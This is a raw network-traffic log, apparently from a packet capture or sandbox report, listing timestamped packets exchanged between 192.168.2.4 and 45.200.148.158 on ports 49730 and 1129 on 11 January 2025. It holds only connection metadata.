Jan 11, 2025 20:26:07.798099041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798113108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798126936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798131943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798141956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798150063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798156023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798170090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798170090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798187017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798202038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798208952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798366070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798893929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798907995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798922062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798937082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798950911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798950911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798966885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798974037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.798981905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.798995018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799005985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799010038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799024105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799042940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799058914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799063921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799073935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799088001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799101114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799114943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799118996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799129009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799139023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799144030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799160004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799168110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799196005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799598932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799612999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799629927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799653053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799654961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799666882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799681902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799684048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799696922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799730062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.799796104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.799827099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885386944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885412931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885426044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885462999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885464907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885477066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885509014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885509968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885555029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885596037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885617971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885653019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885694027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885746956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885761976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885792971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885808945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885832071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.885834932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885849953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.885999918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886014938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886029005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886044025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886044025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886066914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886080980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886158943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886173964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886188030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886209965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886213064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886249065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886296034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886310101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886323929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886338949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886362076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886384010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886560917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886576891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886593103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886606932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886615992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886621952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886645079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886646032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886673927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886679888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886688948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886703014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886739016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886928082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886950016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886964083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886965990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.886979103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.886993885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887016058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887031078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887181044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887196064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887208939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887223005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887233019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887238979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887253046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887257099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887270927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887294054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887471914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887486935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887500048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887511969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887514114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887528896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887537956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887562990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887593985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887609005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887622118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887635946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887641907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887650967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887665033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887680054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887691021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887695074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887712002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887731075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.887733936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887748957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.887785912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888262033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888277054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888317108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888323069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888335943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888350964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888365984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888371944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888381004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888395071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888400078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888408899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888422966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888437033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888443947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888451099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888463974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888464928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888480902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888485909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888494968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888510942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888520956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888545036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888868093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888881922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888895988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888910055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888917923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888931990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888943911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888946056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888959885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888973951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.888984919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.888988018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889000893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889005899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889015913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889029026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889035940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889044046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889056921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889065027 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889071941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889086962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889086962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889101982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889122009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889636993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889655113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889669895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889683962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889695883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889699936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889714956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889719009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889729977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889739990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889744043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889759064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.889764071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.889796019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.890002966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890043020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890055895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890088081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.890178919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890193939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890216112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890218019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.890229940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890245914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.890248060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.891700029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992328882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992346048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992362022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992398024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992469072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992484093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992497921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992503881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992511988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992527962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992532015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992542982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992562056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992574930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992578030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992598057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992614031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992629051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992649078 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992773056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992788076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992801905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992815971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992820978 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992831945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992842913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992866039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992867947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992882013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992918968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.992939949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.992954969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993086100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993098974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993112087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993129015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993134975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993154049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993163109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993174076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993179083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993213892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993228912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993248940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993268967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993433952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993448019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993460894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993475914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993483067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993490934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993505001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993518114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993520021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993532896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993541002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993547916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993577957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993690968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993729115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993837118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993850946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993865013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993879080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993894100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993901014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993907928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993921995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993922949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993936062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993937016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993952990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993966103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.993968964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.993979931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994012117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994221926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994235992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994249105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994256973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994272947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994277954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994287014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994301081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994314909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994318962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994328976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994343042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994359016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994360924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994373083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994386911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994395971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994422913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994651079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994666100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994687080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994786978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994801998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994815111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994822979 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994828939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994846106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994852066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994865894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994879961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994894981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994900942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994909048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994921923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:07.994921923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994937897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:07.994945049 CET	49730	1129	192.168.2.4	45.200.148.158
